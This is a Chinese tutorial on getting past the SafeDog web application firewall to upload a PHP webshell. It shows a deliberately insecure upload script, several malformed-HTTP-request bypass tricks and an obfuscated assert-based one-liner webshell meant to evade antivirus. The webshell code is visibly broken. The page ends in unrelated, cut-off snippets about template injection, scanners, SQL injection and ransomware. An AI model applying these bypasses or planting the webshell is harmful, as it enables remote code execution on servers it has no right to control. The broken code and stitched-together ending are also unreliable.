这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的办法。
思路是:修正HTTP恳求,构成变形HTTP恳求,然后绕过网站安全狗的检测。
废话不多说,切入正题。。。。
1、试验环境:
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048
2、用于文件上传的PHP源码:
$path = dirname(__FILE__) . '/upload/';
$rand = rand(0,30);
move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);
echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "";
echo "OK";
?>
由于此次试验的意图是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。
3、先看一下正常的HTTP恳求:
很明显,文件名为”yijuhua.php”被阻拦。。。。
4、测验%00切断:
很明显,失利了。。。
5、修正HTTP恳求,结构变形HTTP恳求
(1)删去实体里边的Conten-Type字段:
绕过网站安全狗的阻拦,成功上传WebShell。。。
(2)删去Content-Disposition字段里的空格:
(3)修正Content-Disposition字段值的大小写:
6、菜刀衔接一句话:
到此,上传WebShell完毕,各位看理解了吗?
7、免杀PHP一句话:
/*
PHP一句话木马
assert($string)
*/
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i
$func .= $func . $arr[$i];
}
$func($_REQUEST['c']);
?>
8、修正缝隙:
呈现这种状况,我认为是网站安全狗在开发时没有考虑到变形HTTP恳求,而Apache却兼容变形HTTP恳求,所以可以上传成功。
在本年的黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的构成到检测...
今日给咱们介绍的是一款名叫NagaScan的针对Web运用程序的分布式被迫缝隙扫描器,NagaScan现在支撑包括XSS、SQL注入、以及文件包括等缝隙。 NagaScan的运转机制 首要NagaSc...
定论查找: 文件、文件夹、文件内容(运用正则)而在其他帖子中则刺进的歹意挂马代码,运用js载入一个iframe,地址是hxxp://lynxlyragrus.com/aengewauhg/ball/n...
补白: 本文针对mysqljs/mysql。 为了避免SQL注入,能够将SQL中传入参数进行编码,而不是直接进行字符串拼接。在node-mysql中,避免SQL注入的常用办法有以下四种: 办法一:运...
3.2范畴和集体剖析Ualpha表明26为大写字母 break; case "3": ExecuteSql1(co...
需求指出的是,以上趋势仅依据监控数据,实践许多用户是黑客经过服务器进犯浸透侵略内网后投进的勒索病毒,亦或用户终端不联网经过内网其他机器感染的勒索病毒,这些景象下是无法监控到数据的。 5月下面依据病毒传...